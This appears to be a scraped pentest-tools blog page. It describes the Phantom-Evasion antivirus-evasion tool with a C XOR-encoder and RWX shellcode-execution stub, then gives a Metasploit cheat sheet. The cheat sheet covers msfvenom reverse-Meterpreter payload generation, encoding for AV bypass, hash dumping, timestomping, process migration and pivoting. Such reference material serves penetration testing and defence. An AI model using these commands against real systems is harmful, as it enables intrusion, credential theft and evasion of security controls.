During target-side execution this will spawn (using the WinExec or CreateProcess API) a maximum of 4 processes consecutively. The last spawned process reaches the malicious section of code, while the decoy processes spawned before it execute only random junk code.
PRO: longer execution time, lower rate of detection.
CONS: higher resource consumption.

Multibyte Xor Encoder:
C xor encoders with three pure C decoding stubs, available with the Shellcode Injection modules.
MultibyteKey xor: shellcode xored with one multibyte (variable length) random key. Polymorphic C decoder stub.
Double Multibyte-key xor: shellcode xored with the result of the xor between two multibyte (variable length) random keys. Polymorphic C decoder stub.
Triple Multibyte-key xor: shellcode xored with the result of the xor between two multibyte (variable length) random keys, xored with a third multibyte random key. Polymorphic C decoder stub.

Download Phantom-Evasion
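The following is an added example, not Phantom-Evasion's own code, showing in one place what the Linux Shellcode Injection HeapAlloc module and the Multibyte Xor Encoder section describe: a triple multibyte-key XOR encoder, the matching decoder pass, and an mmap/memcpy stub that copies the decoded bytes into an anonymous RWX mapping and calls them. It uses a constructed, benign six-byte "shellcode" (mov eax, 42 ; ret) in place of a real msfvenom payload, assumes x86-64 Linux for the execution step (other hosts skip it), and picks the key lengths 7/5/3 and rand() as illustrative choices. The junk-code randomization that makes the real decoder stub polymorphic is not shown.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/mman.h>

/* Constructed, benign x86-64 "shellcode" for this example: mov eax, 42 ; ret.
 * A real payload (e.g. msfvenom -f c output) would be pasted here instead. */
static const uint8_t k_shellcode[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 };

/* One cyclic multibyte key: buf[i] ^= key[i % klen]. XOR is its own inverse,
 * so the same routine is both the encoder and the decoder stub's core loop. */
static void xor_multibyte(uint8_t *buf, size_t n, const uint8_t *key, size_t klen)
{
    for (size_t i = 0; i < n; i++)
        buf[i] ^= key[i % klen];
}

/* Triple multibyte-key scheme. XOR-ing with (k1 ^ k2) ^ k3 byte-wise is the
 * same as three single-key passes, so the decoder is just the encoder again. */
static void xor_triple(uint8_t *buf, size_t n,
                       const uint8_t *k1, size_t l1,
                       const uint8_t *k2, size_t l2,
                       const uint8_t *k3, size_t l3)
{
    xor_multibyte(buf, n, k1, l1);
    xor_multibyte(buf, n, k2, l2);
    xor_multibyte(buf, n, k3, l3);
}

static size_t gcd_sz(size_t a, size_t b) { while (b) { size_t t = a % b; a = b; b = t; } return a; }
static size_t lcm_sz(size_t a, size_t b) { return a / gcd_sz(a, b) * b; }

/* Why variable-length keys matter: the combined keystream only repeats every
 * lcm(l1, l2, l3) bytes, so coprime lengths 7/5/3 give a 105-byte effective
 * key from 15 bytes of key material. */
size_t combined_period(size_t l1, size_t l2, size_t l3)
{
    return lcm_sz(lcm_sz(l1, l2), l3);
}

/* Deterministic round trip with fixed keys: 1 if the bytes change on encode
 * and come back on decode, 0 otherwise. */
int xor_triple_roundtrip(void)
{
    const uint8_t k1[] = { 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77 };
    const uint8_t k2[] = { 0xa1, 0xb2, 0xc3, 0xd4, 0xe5 };
    const uint8_t k3[] = { 0x0f, 0xf0, 0x5a };
    uint8_t buf[sizeof k_shellcode];
    memcpy(buf, k_shellcode, sizeof buf);
    xor_triple(buf, sizeof buf, k1, sizeof k1, k2, sizeof k2, k3, sizeof k3);
    if (memcmp(buf, k_shellcode, sizeof buf) == 0) return 0;   /* nothing hidden */
    xor_triple(buf, sizeof buf, k1, sizeof k1, k2, sizeof k2, k3, sizeof k3);
    return memcmp(buf, k_shellcode, sizeof buf) == 0;
}

/* 1 when this host can run the sample bytes (x86-64 Linux that grants an
 * anonymous RWX mapping), else 0. Hardened hosts may refuse RWX memory. */
int run_supported(void)
{
#if defined(__x86_64__) && defined(__linux__)
    void *probe = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (probe == MAP_FAILED) return 0;
    munmap(probe, 4096);
    return 1;
#else
    return 0;
#endif
}

/* mmap/memcpy injection as in the HeapAlloc module: map RWX, copy the decoded
 * bytes in, call them. Returns what the code leaves in eax, -1 if mmap fails. */
int run_in_mmap(const uint8_t *code, size_t n)
{
    void *mem = mmap(NULL, n, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return -1;
    memcpy(mem, code, n);
    int (*fn)(void);
    memcpy(&fn, &mem, sizeof fn);   /* object pointer -> function pointer without a cast warning */
    int r = fn();
    munmap(mem, n);
    return r;
}

/* What a generated stub does end to end: draw random keys, encode, decode in
 * memory, execute. Keys are redrawn if the combined keystream happened to be
 * all zero (payload left in clear). Returns 42 here, or -1 if unsupported. */
int encode_decode_and_run(void)
{
    uint8_t k1[7], k2[5], k3[3], buf[sizeof k_shellcode];
    srand((unsigned)time(NULL));
    do {
        for (size_t i = 0; i < sizeof k1; i++) k1[i] = (uint8_t)rand();
        for (size_t i = 0; i < sizeof k2; i++) k2[i] = (uint8_t)rand();
        for (size_t i = 0; i < sizeof k3; i++) k3[i] = (uint8_t)rand();
        memcpy(buf, k_shellcode, sizeof buf);
        xor_triple(buf, sizeof buf, k1, sizeof k1, k2, sizeof k2, k3, sizeof k3);
    } while (memcmp(buf, k_shellcode, sizeof buf) == 0);
    xor_triple(buf, sizeof buf, k1, sizeof k1, k2, sizeof k2, k3, sizeof k3);  /* decoder stub */
    if (!run_supported()) return -1;
    return run_in_mmap(buf, sizeof buf);
}

int main(void)
{
    printf("combined keystream period for key lengths 7/5/3: %zu\n", combined_period(7, 5, 3));
    printf("xor round trip: %s\n", xor_triple_roundtrip() ? "ok" : "FAILED");
    printf("decoded shellcode returned: %d\n", encode_decode_and_run());
    return 0;
}
```

Build with `cc -o stub stub.c` on x86-64 Linux. Note that the "encoder" buys nothing against a detector that emulates the stub: the keys sit next to the ciphertext, and the plaintext payload reappears in memory before the first instruction runs, which is why the real tool also leans on randomized junk code and execution delays.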

Link: http://feedproxy.google.com/~r/PentestTools/~3/u2lYO11vEuc/phantom-evasion-python-av-evasion-tool.html

Metasploit Cheat Sheet

The Metasploit Project is a computer security project that provides information on vulnerabilities, helping in the development of penetration tests and IDS signatures. Metasploit is a popular tool used by pentest experts.

Metasploit:
Search for a module:
msf > search [regex]
Specify an exploit to use:
msf > use exploit/[ExploitPath]
Specify a payload to use:
msf > set PAYLOAD [PayloadPath]
Show options for the current module:
msf > show options
Set options:
msf > set [Option] [Value]
Start the exploit:
msf > exploit

Useful Auxiliary Modules
Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
DNS Enumeration:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
FTP Server:
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
Proxy Server:
msf > use auxiliary/server/socks4
msf > run

msfvenom:
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with '-l payloads' to get a list of payloads.
$ msfvenom -p [PayloadPath] -f [FormatType] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
Example: reverse Meterpreter payload as an executable, redirected into a file:
$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe
Format Options (specified with -f):
--help-formats - List available output formats
exe - Executable
pl - Perl
rb - Ruby
raw - Raw shellcode
c - C code

Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Bear in mind that encoders exist mainly to avoid bad characters; a well-known encoder such as shikata_ga_nai is itself signatured by most current AV engines, so encoding alone rarely evades detection. Run with '-l encoders' to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeIterations] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
Example: encode a payload 5 times using the shikata_ga_nai encoder and output as an executable:
$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Metasploit Meterpreter
Base Commands:
? / help: Display a summary of commands
exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Self-explanatory
File System Commands:
cd: Change directory
lcd: Change directory on the local (attacker's) machine
pwd / getwd: Display the current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove a directory
edit: Open a file in the default editor (typically vi)
Process Commands:
getpid: Display the process ID that Meterpreter is running inside
getuid: Display the user ID that Meterpreter is running with
ps: Display the process list
kill: Terminate a process given its process ID
execute: Run a given program with the privileges of the process Meterpreter is loaded in
migrate: Jump to a given destination process ID
- the target process must have the same or lesser privileges
- the target process may be a more stable process
- once inside a process, Meterpreter can access any files that process has a lock on
Network Commands:
ipconfig: Show network interface information
portfwd: Forward packets through the TCP session
route: Manage/view the system's routing table
Misc Commands:
idletime: Display the duration that the GUI of the target machine has been idle
uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or the keyboard of the target machine
screenshot: Save a screenshot of the target machine as an image
Additional Modules:
use [module]: Load the specified module
Example:
use priv: Load the priv module
hashdump: Dump the hashes from the box
timestomp: Alter NTFS file timestamps

Managing Sessions
Multiple Exploitation:
Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z
Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit -j
List all current jobs (usually exploit listeners):
msf > jobs -l
Kill a job:
msf > jobs -k [JobID]
Multiple Sessions:
List all backgrounded sessions:
msf > sessions -l
Interact with a backgrounded session:
msf > sessions -i [SessionID]
Background the current interactive session:
meterpreter > <Ctrl+Z>
or
meterpreter > background
Routing Through Sessions:
All modules (exploits/post/aux) run against the target subnet will be pivoted through this session.
msf > route add [Subnet to Route To] [Subnet Netmask] [SessionID]

Metasploit Cheat Sheet

Link: http://www.kitploit.com/2019/02/metasploit-cheat-sheet.html